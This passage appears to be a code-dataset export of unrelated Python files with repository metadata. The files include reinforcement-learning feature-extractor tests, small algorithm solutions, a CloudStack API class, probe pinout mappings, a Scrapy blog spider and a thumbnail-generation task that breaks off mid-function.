self._test_extract_max_q_discrete_action(normalize=False)
def test_extract_max_q_discrete_action_normalize(self):
self._test_extract_max_q_discrete_action(normalize=True)
def _test_extract_max_q_discrete_action(self, normalize):
extractor = TrainingFeatureExtractor(
state_normalization_parameters=self.get_state_normalization_parameters(),
max_q_learning=True,
normalize=normalize,
)
# Setup
ws, net = self.create_ws_and_net(extractor)
input_record = self.create_extra_input_record(net)
self.setup_state_features(ws, input_record.state_features)
self.setup_next_state_features(ws, input_record.next_state_features)
action = self.setup_action(ws, input_record.action)
possible_next_actions = self.setup_possible_next_actions(
ws, input_record.possible_next_actions
)
reward = self.setup_reward(ws, input_record.reward)
extra_data = self.setup_extra_data(ws, input_record)
# Run
ws.run(net)
res = extractor.extract(ws, input_record, net.output_record())
o = res.training_input
npt.assert_array_equal(reward.reshape(-1, 1), o.reward.numpy())
npt.assert_array_equal(
extra_data.action_probability.reshape(-1, 1),
res.extras.action_probability.numpy(),
)
npt.assert_array_equal(action, o.action.numpy())
npt.assert_array_equal(
possible_next_actions[0], o.possible_next_actions.lengths.numpy()
)
npt.assert_array_equal(
possible_next_actions[1], o.possible_next_actions.actions.numpy()
)
npt.assert_allclose(
self.expected_state_features(normalize),
o.state.float_features.numpy(),
rtol=1e-6,
)
npt.assert_allclose(
self.expected_next_state_features(normalize),
o.next_state.float_features.numpy(),
rtol=1e-6,
)
def test_extract_sarsa_discrete_action(self):
self._test_extract_sarsa_discrete_action(normalize=False)
def test_extract_sarsa_discrete_action_normalize(self):
self._test_extract_sarsa_discrete_action(normalize=True)
def _test_extract_sarsa_discrete_action(self, normalize):
extractor = TrainingFeatureExtractor(
state_normalization_parameters=self.get_state_normalization_parameters(),
max_q_learning=False,
normalize=normalize,
)
# Setup
ws, net = self.create_ws_and_net(extractor)
input_record = self.create_extra_input_record(net)
self.setup_state_features(ws, input_record.state_features)
self.setup_next_state_features(ws, input_record.next_state_features)
action = self.setup_action(ws, input_record.action)
next_action = self.setup_next_action(ws, input_record.next_action)
reward = self.setup_reward(ws, input_record.reward)
extra_data = self.setup_extra_data(ws, input_record)
# Run
ws.run(net)
res = extractor.extract(ws, input_record, net.output_record())
o = res.training_input
npt.assert_array_equal(reward.reshape(-1, 1), o.reward.numpy())
npt.assert_array_equal(
extra_data.action_probability.reshape(-1, 1),
res.extras.action_probability.numpy(),
)
npt.assert_array_equal(action, o.action.numpy())
npt.assert_array_equal(next_action, o.next_action.numpy())
npt.assert_allclose(
self.expected_state_features(normalize),
o.state.float_features.numpy(),
rtol=1e-6,
)
npt.assert_allclose(
self.expected_next_state_features(normalize),
o.next_state.float_features.numpy(),
rtol=1e-6,
)
def test_extract_max_q_parametric_action(self):
self._test_extract_max_q_parametric_action(normalize=False)
def test_extract_max_q_parametric_action_normalize(self):
self._test_extract_max_q_parametric_action(normalize=True)
def _test_extract_max_q_parametric_action(self, normalize):
extractor = TrainingFeatureExtractor(
state_normalization_parameters=self.get_state_normalization_parameters(),
action_normalization_parameters=self.get_action_normalization_parameters(),
max_q_learning=True,
normalize=normalize,
)
# Setup
ws, net = self.create_ws_and_net(extractor)
input_record = self.create_extra_input_record(net)
self.setup_state_features(ws, input_record.state_features)
self.setup_next_state_features(ws, input_record.next_state_features)
self.setup_action_features(ws, input_record.action)
possible_next_actions = self.setup_possible_next_actions_features(
ws, input_record.possible_next_actions
)
reward = self.setup_reward(ws, input_record.reward)
extra_data = self.setup_extra_data(ws, input_record)
# Run
ws.run(net)
res = extractor.extract(ws, input_record, net.output_record())
o = res.training_input
npt.assert_array_equal(reward.reshape(-1, 1), o.reward.numpy())
npt.assert_array_equal(
extra_data.action_probability.reshape(-1, 1),
res.extras.action_probability.numpy(),
)
npt.assert_allclose(
self.expected_action_features(normalize),
o.action.float_features.numpy(),
rtol=1e-6,
)
npt.assert_array_equal(
possible_next_actions[0], o.possible_next_actions.lengths.numpy()
)
npt.assert_allclose(
self.expected_possible_next_actions_features(normalize),
o.possible_next_actions.actions.float_features.numpy(),
rtol=1e-6,
)
npt.assert_allclose(
self.expected_state_features(normalize),
o.state.float_features.numpy(),
rtol=1e-6,
)
npt.assert_allclose(
self.expected_tiled_next_state_features(normalize),
o.tiled_next_state.float_features.numpy(),
rtol=1e-6,
)
def test_extract_sarsa_parametric_action(self):
self._test_extract_sarsa_parametric_action(normalize=False)
def test_extract_sarsa_parametric_action_normalize(self):
self._test_extract_sarsa_parametric_action(normalize=True)
def _test_extract_sarsa_parametric_action(self, normalize):
extractor = TrainingFeatureExtractor(
state_normalization_parameters=self.get_state_normalization_parameters(),
action_normalization_parameters=self.get_action_normalization_parameters(),
max_q_learning=False,
normalize=normalize,
)
# Setup
ws, net = self.create_ws_and_net(extractor)
input_record = self.create_extra_input_record(net)
self.setup_state_features(ws, input_record.state_features)
self.setup_next_state_features(ws, input_record.next_state_features)
self.setup_action_features(ws, input_record.action)
self.setup_next_action_features(ws, input_record.next_action)
reward = self.setup_reward(ws, input_record.reward)
extra_data = self.setup_extra_data(ws, input_record)
# Run
ws.run(net)
res = extractor.extract(ws, input_record, net.output_record())
o = res.training_input
npt.assert_array_equal(reward.reshape(-1, 1), o.reward.numpy())
npt.assert_array_equal(
extra_data.action_probability.reshape(-1, 1),
res.extras.action_probability.numpy(),
)
npt.assert_allclose(
self.expected_action_features(normalize),
o.action.float_features.numpy(),
rtol=1e-6,
)
npt.assert_allclose(
self.expected_next_action_features(normalize),
o.next_action.float_features.numpy(),
rtol=1e-6,
)
npt.assert_allclose(
self.expected_state_features(normalize),
o.state.float_features.numpy(),
rtol=1e-6,
)
npt.assert_allclose(
self.expected_next_state_features(normalize),
o.next_state.float_features.numpy(),
rtol=1e-6,
)
def test_create_net_max_q_discrete_action(self):
extractor = TrainingFeatureExtractor(
state_normalization_parameters=self.get_state_normalization_parameters(),
max_q_learning=True,
)
expected_input_record = schema.Struct(
("state_features", map_schema()),
("next_state_features", map_schema()),
("action", schema.Scalar()),
("possible_next_actions", schema.List(schema.Scalar())),
)
expected_output_record = schema.Struct(
("state", schema.Scalar()),
("next_state", schema.Scalar()),
("action", schema.Scalar()),
("possible_next_actions", schema.List(schema.Scalar())),
)
self.check_create_net_spec(
extractor, expected_input_record, expected_output_record
)
def test_create_net_sarsa_discrete_action(self):
extractor = TrainingFeatureExtractor(
state_normalization_parameters=self.get_state_normalization_parameters(),
max_q_learning=False,
)
expected_input_record = schema.Struct(
("state_features", map_schema()),
("next_state_features", map_schema()),
("action", schema.Scalar()),
("next_action", schema.Scalar()),
)
expected_output_record = schema.Struct(
("state", schema.Scalar()),
("next_state", schema.Scalar()),
("action", schema.Scalar()),
("next_action", schema.Scalar()),
)
self.check_create_net_spec(
extractor, expected_input_record, expected_output_record
)
def test_create_net_max_q_parametric_action(self):
self._test_create_net_max_q_parametric_action(normalize=False)
def test_create_net_max_q_parametric_action_normalize(self):
self._test_create_net_max_q_parametric_action(normalize=True)
def _test_create_net_max_q_parametric_action(self, normalize):
extractor = TrainingFeatureExtractor(
state_normalization_parameters=self.get_state_normalization_parameters(),
action_normalization_parameters=self.get_action_normalization_parameters(),
max_q_learning=True,
normalize=normalize,
)
expected_input_record = schema.Struct(
("state_features", map_schema()),
("next_state_features", map_schema()),
("action", map_schema()),
("possible_next_actions", schema.List(map_schema())),
)
expected_output_record = schema.Struct(
("state", schema.Scalar()),
("tiled_next_state", schema.Scalar()),
("action", schema.Scalar()),
("possible_next_actions", schema.List(schema.Scalar())),
)
self.check_create_net_spec(
extractor, expected_input_record, expected_output_record
)
def test_create_net_sarsa_parametric_action(self):
self._test_create_net_sarsa_parametric_action(normalize=False)
def test_create_net_sarsa_parametric_action_normalize(self):
self._test_create_net_sarsa_parametric_action(normalize=True)
def _test_create_net_sarsa_parametric_action(self, normalize):
extractor = TrainingFeatureExtractor(
state_normalization_parameters=self.get_state_normalization_parameters(),
action_normalization_parameters=self.get_action_normalization_parameters(),
max_q_learning=False,
normalize=normalize,
)
expected_input_record = schema.Struct(
("state_features", map_schema()),
("next_state_features", map_schema()),
("action", map_schema()),
("next_action", map_schema()),
)
expected_output_record = schema.Struct(
("state", schema.Scalar()),
("next_state", schema.Scalar()),
("action", schema.Scalar()),
("next_action", schema.Scalar()),
)
self.check_create_net_spec(
extractor, expected_input_record, expected_output_record
)
class TestPredictorFeatureExtractor(FeatureExtractorTestBase):
def setup_float_features(self, ws, field):
lengths = np.array([3 + 2, 0 + 4, 5 + 2], dtype=np.int32)
keys = np.array(
[2, 11, 12, 1, 14, 11, 12, 13, 9, 1, 13, 12, 2, 3, 4, 5], dtype=np.int64
)
values = np.array(
[0, 20, 21, 1, 22, 23, 24, 25, 2, 3, 26, 27, 4, 5, 6, 7], dtype=np.float32
)
# values = np.arange(8).astype(np.float32)
ws.feed_blob(str(field.lengths()), lengths)
ws.feed_blob(str(field.keys()), keys)
ws.feed_blob(str(field.values()), values)
return lengths, keys, values
def expected_state_features(self, normalize):
# Feature order: 1, 3, 2, 4
dense = np.array(
[
[1, MISSING_VALUE, 0, MISSING_VALUE],
[MISSING_VALUE, MISSING_VALUE, MISSING_VALUE, MISSING_VALUE],
[3, 5, 4, 6],
],
dtype=np.float32,
)
if normalize:
dense = NumpyFeatureProcessor.preprocess_array(
dense, [1, 3, 2, 4], self.get_state_normalization_parameters()
)
return dense
def expected_action_features(self, normalize):
# Feature order: 12, 11, 13
dense = np.array(
[[21, 20, MISSING_VALUE], [24, 23, 25], [27, MISSING_VALUE, 26]],
dtype=np.float32,
)
if normalize:
dense = NumpyFeatureProcessor.preprocess_array(
dense, [12, 11, 13], self.get_action_normalization_parameters()
)
return dense
def test_extract_no_action(self):
self._test_extract_no_action(normalize=False)
def test_extract_no_action_normalize(self):
self._test_extract_no_action(normalize=True)
def _test_extract_no_action(self, normalize):
extractor = PredictorFeatureExtractor(
state_normalization_parameters=self.get_state_normalization_parameters(),
normalize=normalize,
)
# Setup
ws, net = self.create_ws_and_net(extractor)
input_record = net.input_record()
self.setup_float_features(ws, input_record.float_features)
# Run
ws.run(net)
res = extractor.extract(ws, input_record, net.output_record())
npt.assert_allclose(
self.expected_state_features(normalize),
res.state.float_features.numpy(),
rtol=1e-6,
)
def test_extract_parametric_action(self):
self._test_extract_parametric_action(normalize=False)
def test_extract_parametric_action_normalize(self):
self._test_extract_parametric_action(normalize=True)
def _test_extract_parametric_action(self, normalize):
extractor = PredictorFeatureExtractor(
state_normalization_parameters=self.get_state_normalization_parameters(),
action_normalization_parameters=self.get_action_normalization_parameters(),
normalize=normalize,
)
# Setup
ws, net = self.create_ws_and_net(extractor)
input_record = net.input_record()
self.setup_float_features(ws, input_record.float_features)
# Run
ws.run(net)
res = extractor.extract(ws, input_record, net.output_record())
npt.assert_allclose(
self.expected_action_features(normalize),
res.action.float_features.numpy(),
rtol=1e-6,
)
npt.assert_allclose(
self.expected_state_features(normalize),
res.state.float_features.numpy(),
rtol=1e-6,
)
def test_create_net_sarsa_no_action(self):
self._test_create_net_sarsa_no_action(normalize=False)
def test_create_net_sarsa_no_action_normalize(self):
self._test_create_net_sarsa_no_action(normalize=True)
def _test_create_net_sarsa_no_action(self, normalize):
extractor = PredictorFeatureExtractor(
state_normalization_parameters=self.get_state_normalization_parameters(),
normalize=normalize,
)
expected_input_record = schema.Struct(("float_features", map_schema()))
expected_output_record = schema.Struct(("state", schema.Scalar()))
self.check_create_net_spec(
extractor, expected_input_record, expected_output_record
)
def test_create_net_parametric_action(self):
self._test_create_net_parametric_action(normalize=False)
def test_create_net_parametric_action_normalize(self):
self._test_create_net_parametric_action(normalize=True)
def _test_create_net_parametric_action(self, normalize):
extractor = PredictorFeatureExtractor(
state_normalization_parameters=self.get_state_normalization_parameters(),
action_normalization_parameters=self.get_action_normalization_parameters(),
normalize=normalize,
)
expected_input_record = schema.Struct(("float_features", map_schema()))
expected_output_record = schema.Struct(
("state", schema.Scalar()), ("action", schema.Scalar())
)
self.check_create_net_spec(
extractor, expected_input_record, expected_output_record
)
| [
"[email protected]"
] | |
043726843b64f7026111458e53c6551599ad3e12 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03328/s713805169.py | 9bf51a8dd2d62f9ce6c096b400cb84417951bd79 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 454 | py | import sys
import math
import itertools
import collections
import heapq
import re
import numpy as np
from functools import reduce
rr = lambda: sys.stdin.readline().rstrip()
rs = lambda: sys.stdin.readline().split()
ri = lambda: int(sys.stdin.readline())
rm = lambda: map(int, sys.stdin.readline().split())
rl = lambda: list(map(int, sys.stdin.readline().split()))
inf = float('inf')
mod = 10**9 + 7
a, b = rm()
c = b - a
c = c*(c+1)//2
print(c-b)
| [
"[email protected]"
] | |
f096553bf112edde9a685cccede57835e9c15dd8 | 392a35174450d1151d276481be4bb4c1ed1fc841 | /chapter-05/Q06_conversion.py | d280bd750de009a1f698bee7dc71814d7822e90f | [] | no_license | jcockbain/ctci-solutions | 8f96a87532a7581cdfc55c29c8684fcdfab77a62 | 6854e9f6c7074ae22e01c3e5f6c03f641e507cd7 | refs/heads/master | 2023-01-15T16:59:58.038900 | 2020-11-28T09:14:36 | 2020-11-28T09:14:36 | 202,898,842 | 6 | 0 | null | 2020-11-28T09:14:37 | 2019-08-17T15:33:25 | Python | UTF-8 | Python | false | false | 254 | py | import unittest
def conversion(n1, n2):
c = n1 ^ n2
count = 0
while c:
c &= c - 1
count += 1
return count
class Test(unittest.TestCase):
def test_conversion(self):
self.assertEqual(2, conversion(29, 15))
| [
"[email protected]"
] | |
d3c04239cbf82fb6c83edd7f0d839a76a25a1fb7 | c19ca6779f247572ac46c6f95327af2374135600 | /backtrack/leetcode 784 Letter Case Permutation.py | 7145ae98631ee4d97b9ba49b7d4cfe96f90f5f24 | [] | no_license | clhchtcjj/Algorithm | aae9c90d945030707791d9a98d1312e4c07705f8 | aec68ce90a9fbceaeb855efc2c83c047acbd53b5 | refs/heads/master | 2021-01-25T14:24:08.037204 | 2018-06-11T14:31:38 | 2018-06-11T14:31:38 | 123,695,313 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,006 | py | __author__ = 'CLH'
'''
Given a string S, we can transform every letter individually to be lowercase or uppercase to create another string. Return a list of all possible strings we could create.
'''
class Solution(object):
def __init__(self):
self.S = []
self.answer = []
self.total_answer = []
def is_a_solution(self,k):
return k == len(self.S)
def process_solution(self):
self.total_answer.append(''.join(self.answer))
def constact_candiates(self, k):
if self.S[k].isalpha():
if ord(self.S[k]) > 96:
return [self.S[k],chr(ord(self.S[k])-32)]
else:
return [chr(ord(self.S[k])+32),self.S[k]]
else:
return [self.S[k]]
def backtrack(self,k):
if self.is_a_solution(k):
self.process_solution()
else:
k = k + 1
candidates = self.constact_candiates(k-1)
for ch in candidates:
self.answer.append(ch)
self.backtrack(k)
self.answer.pop()
if k == len(self.answer):
return
def letterCasePermutation(self, S):
"""
:type S: str
:rtype: List[str]
"""
self.S = S
self.backtrack(0)
return self.total_answer
# 简单解法
# def letterCasePermutation(self, S):
# ans = [[]]
#
# for char in S:
# n = len(ans)
# if char.isalpha():
# for i in range(n):
# ans.append(ans[i][:])
# ans[i].append(char.lower())
# ans[n+i].append(char.upper())
# else:
# for i in range(n):
# ans[i].append(char)
# # temp = list(map("".join, ans))
# # print(temp)
# return list(map("".join, ans))
if __name__ == "__main__":
S = Solution()
print(S.letterCasePermutation("a1b2")) | [
"[email protected]"
] | |
56a2b628001cbc8b80e9af74b4972644b513bd67 | 81407be1385564308db7193634a2bb050b4f822e | /library/lib_study/138_mm_imghdr.py | b2e25a38bf54fb2a4859d179ee87719fc5ae4348 | [
"MIT"
] | permissive | gottaegbert/penter | 6db4f7d82c143af1209b4259ba32145aba7d6bd3 | 8cbb6be3c4bf67c7c69fa70e597bfbc3be4f0a2d | refs/heads/master | 2022-12-30T14:51:45.132819 | 2020-10-09T05:33:23 | 2020-10-09T05:33:23 | 305,266,398 | 0 | 0 | MIT | 2020-10-19T04:56:02 | 2020-10-19T04:53:05 | null | UTF-8 | Python | false | false | 210 | py | # imghdr模块 推测文件或字节流中的图像的类型
import imghdr
print(imghdr.what('bass.gif'))
# gif
# 可以识别的图像类型 https://docs.python.org/zh-cn/3/library/imghdr.html#imghdr.what
| [
"[email protected]"
] | |
ee9ade01e55751cb4ad59fad7e8007aa52bf3c2d | d5b339d5b71c2d103b186ed98167b0c9488cff09 | /marvin/cloudstackAPI/createCounter.py | a4ed8386ce48bc5d359fb2c7235ada34f89378f4 | [
"Apache-2.0"
] | permissive | maduhu/marvin | 3e5f9b6f797004bcb8ad1d16c7d9c9e26a5e63cc | 211205ae1da4e3f18f9a1763f0f8f4a16093ddb0 | refs/heads/master | 2020-12-02T17:45:35.685447 | 2017-04-03T11:32:11 | 2017-04-03T11:32:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,275 | py | """Adds metric counter"""
from baseCmd import *
from baseResponse import *
class createCounterCmd (baseCmd):
typeInfo = {}
def __init__(self):
self.isAsync = "true"
"""Name of the counter."""
"""Required"""
self.name = None
self.typeInfo['name'] = 'string'
"""Source of the counter."""
"""Required"""
self.source = None
self.typeInfo['source'] = 'string'
"""Value of the counter e.g. oid in case of snmp."""
"""Required"""
self.value = None
self.typeInfo['value'] = 'string'
self.required = ["name", "source", "value", ]
class createCounterResponse (baseResponse):
typeInfo = {}
def __init__(self):
"""the id of the Counter"""
self.id = None
self.typeInfo['id'] = 'string'
"""Name of the counter."""
self.name = None
self.typeInfo['name'] = 'string'
"""Source of the counter."""
self.source = None
self.typeInfo['source'] = 'string'
"""Value in case of snmp or other specific counters."""
self.value = None
self.typeInfo['value'] = 'string'
"""zone id of counter"""
self.zoneid = None
self.typeInfo['zoneid'] = 'string'
| [
"[email protected]"
] | |
087a67e5405e3ada78f98dc48c3379436a96b3a2 | 6ac723c541e410f737be68f0af634c738e881d74 | /probes.py | abd27d07112f5ce2f0c88bd8935838e6c005df25 | [] | no_license | cxrodgers/Adapters | d478616372ca9fbfc55a886d5b384a15b01a7b91 | da68169c4bb8d8f3c4df13205df2626635632cb8 | refs/heads/master | 2022-12-22T07:46:25.588285 | 2022-12-09T15:21:54 | 2022-12-09T15:21:54 | 4,681,174 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,830 | py | """Pinout for each probe, from channel numbers to Samtec numbers."""
from builtins import range
import Adapters
## This is for Adrian's 1x8 shank array
# This one goes from "electrode #" (depth?) to "interposer PCB #"
adrian_8shank2interposer = Adapters.Adapter(
[27, 25, 21, 20, 9],
[41, 45, 53, 55, 52],
)
# This one goes from interposer PCB # to Samtec numbers
# This uses the little handbuild adapter I made that is an ON1 (I think)
# superglued to a breadboard PCB and hand-wired.
# Here I will use 41-80 as Samtec numbers, with 1 in the upper left when
# looking into the next adapter (out of the probe).
# The reason to use 41-80 is because this will be used with the bottom
# connector on ON4.
interposer2samtec = Adapters.Adapter([
33, 34, 35, 36, 37, 38, 39, 40, # first column (shank side to top side)
41, 42, 43, 44, 45, 46, 47, 48, # second column (top side to shank side)
49, 50, 51, #52, 53, 54, 55, # third column (shank side to top side)
], [
53, 57, 58, 61, 62, 65, 73, 77,
49, 45, 41, 80, 76, 72, 68, 63,
64, 60, 56,
]
)
# Hack the above
# The inner column of interposer doesn't have any useful sites, according
# to Adrian. And the outer column of my adapter isn't wired up fully.
# So, shift the interposer such that its inner column is floating.
# Same as above, except
interposer2samtec_shifted = Adapters.Adapter([
#33, 34, 35, 36, 37, 38, 39, 40, # first (innermost) column (shank side to top side)
48, 47, 46, 45, 44, 43, 42, 41, # second column (shank side to top side)
#41, 42, 43, 44, 45, 46, 47, 48, # second column (top side to shank side)
49, 50, 51, 52, 53, 54, 55, # third column (shank side to top side)
], [
53, 57, 58, 61, 62, 65, 73, 77,
49, 45, 41, 80, 76, 72, 68, #63,
#64, 60, 56,
]
)
## End Adrian's array
# This is the A32 connector pinout from neuronexus.
# Takes us from "Samtec numbers" to Neuronexus channel numbers.
# Samtec numbers go from 1-40, with 1 in the upper right when looking at
# the probe, or 1 in the upper left when looking at the adapter.
samtec2nn = Adapters.Adapter(list(range(1, 41)), [
11, 'GND', 'GND', 32,
9, 'REF', 'NC', 30,
7, 'NC', 'NC', 31,
5, 'NC', 'NC', 28,
3, 1, 26, 29,
2, 4, 24, 27,
6, 13, 20, 25,
8, 14, 19, 22,
10, 15, 18, 23,
12, 16, 17, 21,
])
# This is for the Janelia pinout
# As before, Samtec numbers go from 1-40, with 1 in the upper right when
# looking at the probe. The source doc from Tim Harris shows the back side
# of the probe, so 1 is in the upper left (as it is for the adapter).
samtec2janelia_top = Adapters.Adapter(list(range(1, 41)), [
1, 'NC', 'NC', 64,
2, 'NC', 'NC', 63,
3, 'NC', 'NC', 62,
4, 'NC', 'NC', 61,
5, 6, 59, 60,
7, 8, 57, 58,
9, 10, 55, 56,
11, 12, 53, 54,
13, 14, 51, 52,
15, 16, 49, 50,
])
samtec2janelia_bottom = Adapters.Adapter(list(range(1, 41)), [
17, 'NC', 'NC', 48,
18, 'NC', 'NC', 47,
19, 'NC', 'NC', 46,
20, 'NC', 'NC', 45,
21, 22, 43, 44,
23, 28, 37, 42,
24, 32, 33, 41,
25, 29, 36, 40,
26, 30, 35, 39,
27, 31, 34, 38,
])
# A 64-channel version with two samtecs, 1-40 on the top and 41-80 on the bottom
samtec2janelia_64ch = Adapters.Adapter(list(range(1, 81)),
[
1, 'NC', 'NC', 64,
2, 'NC', 'NC', 63,
3, 'NC', 'NC', 62,
4, 'NC', 'NC', 61,
5, 6, 59, 60,
7, 8, 57, 58,
9, 10, 55, 56,
11, 12, 53, 54,
13, 14, 51, 52,
15, 16, 49, 50,
17, 'NC', 'NC', 48,
18, 'NC', 'NC', 47,
19, 'NC', 'NC', 46,
20, 'NC', 'NC', 45,
21, 22, 43, 44,
23, 28, 37, 42,
24, 32, 33, 41,
25, 29, 36, 40,
26, 30, 35, 39,
27, 31, 34, 38,
]) | [
"[email protected]"
] | |
161ef121e5f50f8ab2a32b0600ab9a65c050b69b | 01b49cefcb2e1aae896a444e525c4cd09aff68be | /nyankobiyori.py | 5e84f044fb388d972b61ccd0aeeb3abbcb0436e1 | [
"MIT"
] | permissive | ikeikeikeike/scrapy-2ch-summary-spiders | 308eccbe83bfc03064ec4b7a9b3952985bf58a15 | 7142693f25025a09390377649a727cfd33d15af3 | refs/heads/master | 2020-04-01T18:04:38.319532 | 2015-01-08T08:30:16 | 2015-01-08T08:30:16 | 28,956,442 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,625 | py | # -*- coding: utf-8 -*-
import re
import itertools
from scrapy import log
from scrapy.selector import Selector
from summaries.items import SummariesItem
from thread_float_bbs import (
SequenceAppend,
ThreadFloatBbsSpider
)
class NyankobiyoriSpider(ThreadFloatBbsSpider):
""" for nyankobiyori.com
"""
name = 'nyankobiyori'
allowed_domains = ['nyankobiyori.com']
start_urls = ['http://nyankobiyori.com/index.rdf']
def spider_page(self, response):
""" scraping page
"""
sel = Selector(response)
image_urls = []
contents = SequenceAppend({
"index": int,
"subject": '',
"body": ''
})
# Main
main = sel.css('div.body')
generator = itertools.izip(main.css('.t_h'), main.css('.t_b'))
for sub, body in generator:
image_urls.extend(sub.css('img').xpath('@src').extract())
image_urls.extend(body.css('img').xpath('@src').extract())
contents.append({
"subject": sub.extract(),
"body": body.extract()
})
# body more
main = sel.css('div.bodymore')
generator = itertools.izip(main.css('.t_h'), main.css('.t_b'))
for sub, body in generator:
image_urls.extend(sub.css('img').xpath('@src').extract())
image_urls.extend(body.css('img').xpath('@src').extract())
contents.append({
"subject": sub.extract(),
"body": body.extract()
})
item = dict(
posted=False,
source=self.extract_source(sel),
url=response.url,
title=self.get_text(sel.css('h1 span')),
tags=self.extract_tags(sel, response),
contents=contents.result(),
image_urls=image_urls
)
# set title from source.
return self.request_title(item['source'], SummariesItem(**item))
def extract_source(self, selector):
""" Sourceを抽出
"""
try:
url = [
text for
text in selector.css('div.bodymore span').xpath('text()').extract()
if text.find('2ch.net') != -1
or text.find('2ch.sc') != -1
or text.find('www.logsoku.com') != -1
][0]
return re.search(u"(?P<url>https?://[^\s][^」]+)", url).group("url").strip()
except Exception as exc:
log.msg(
format=("Extract source (error): "
"Error selector %(selector)s "
"url `%(url)s`: %(errormsg)s"),
level=log.WARNING,
spider=self,
selector=selector,
url=selector.response.url,
errormsg=str(exc))
return None
def extract_tags(self, selector, response):
""" tagsを抽出
"""
try:
feed = self.get_feed(response.url)
tags = [
self.get_text(tag)
for tag in selector.css('p[class^=category_] a,p.tag a')
]
return list(set([feed['tags'][0]['term']] + tags))
except Exception as exc:
log.msg(
format=("Extract tags (error): "
"Error selector %(selector)s "
"url `%(url)s`: %(errormsg)s"),
level=log.WARNING,
spider=self,
selector=selector,
url=response.url,
errormsg=str(exc))
return []
| [
"[email protected]"
] | |
1e23e7a0136d045d6b3707215f193b71e0e7ee8c | 62420e35e497f3026a980f1ab6dd07756eeeae7f | /oparlsync/generate_thumbnails/GenerateThumbnails.py | 804a53c257d97dd0ebb4f2b689dcd0deabb6991d | [] | no_license | curiousleo/daemon | b530f528449579ecbb0bd52dee94cbc954bd9b96 | d47a5b49ac144b9992ab35ff09f113a94f16bd60 | refs/heads/master | 2020-04-14T01:56:52.316211 | 2018-12-30T09:20:18 | 2018-12-30T09:42:53 | 163,573,533 | 0 | 0 | null | 2018-12-30T08:38:41 | 2018-12-30T08:38:41 | null | UTF-8 | Python | false | false | 9,206 | py | # encoding: utf-8
"""
Copyright (c) 2012 - 2016, Ernesto Ruge
All rights reserved.
Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
import os
import shutil
import datetime
from PIL import Image
from ..base_task import BaseTask
from ..models import Body, File
from minio.error import ResponseError, NoSuchKey
from pymongo.errors import CursorNotFound
class GenerateThumbnails(BaseTask):
name = 'GenerateThumbnails'
services = [
'mongodb',
's3'
]
def __init__(self, body_id):
self.body_id = body_id
super().__init__()
self.statistics = {
'wrong-mimetype': 0,
'file-missing': 0,
'successful': 0
}
def run(self, body_id, *args):
if not self.config.ENABLE_PROCESSING:
return
self.body = Body.objects(uid=body_id).no_cache().first()
if not self.body:
return
files = File.objects(thumbnailStatus__exists=False, body=self.body.id).no_cache().all()
while True:
try:
file = next(files)
except CursorNotFound:
files = File.objects(thumbnailStatus__exists=False, body=self.body.id).no_cache().all()
file = next(files)
continue
except StopIteration:
break
if not file:
break
self.datalog.info('processing file %s' % file.id)
file.modified = datetime.datetime.now()
file.thumbnailGenerated = datetime.datetime.now()
# get file
file_path = os.path.join(self.config.TMP_THUMBNAIL_DIR, str(file.id))
if not self.get_file(file, file_path):
self.datalog.warn('file not found: %s' % file.id)
self.statistics['file-missing'] += 1
file.thumbnailStatus = 'file-missing'
file.thumbnailsGenerated = datetime.datetime.now()
file.modified = datetime.datetime.now()
file.save()
continue
if file.mimeType not in ['application/msword', 'application/pdf']:
self.datalog.warn('wrong mimetype: %s' % file.id)
self.statistics['wrong-mimetype'] += 1
file.thumbnailStatus = 'wrong-mimetype'
file.thumbnailsGenerated = datetime.datetime.now()
file.modified = datetime.datetime.now()
file.save()
os.unlink(file_path)
continue
file_path_old = False
if file.mimeType == 'application/msword':
file_path_old = file_path
file_path = file_path + '-old'
cmd = ('%s --to=PDF -o %s %s' % (self.config.ABIWORD_COMMAND, file_path, file_path_old))
self.execute(cmd, self.body.id)
# create folders
max_folder = os.path.join(self.config.TMP_THUMBNAIL_DIR, str(file.id) + '-max')
if not os.path.exists(max_folder):
os.makedirs(max_folder)
out_folder = os.path.join(self.config.TMP_THUMBNAIL_DIR, str(file.id) + '-out')
if not os.path.exists(out_folder):
os.makedirs(out_folder)
for size in self.config.THUMBNAIL_SIZES:
if not os.path.exists(os.path.join(out_folder, str(size))):
os.makedirs(os.path.join(out_folder, str(size)))
file.thumbnail = {}
pages = 0
# generate max images
max_path = max_folder + os.sep + '%d.png'
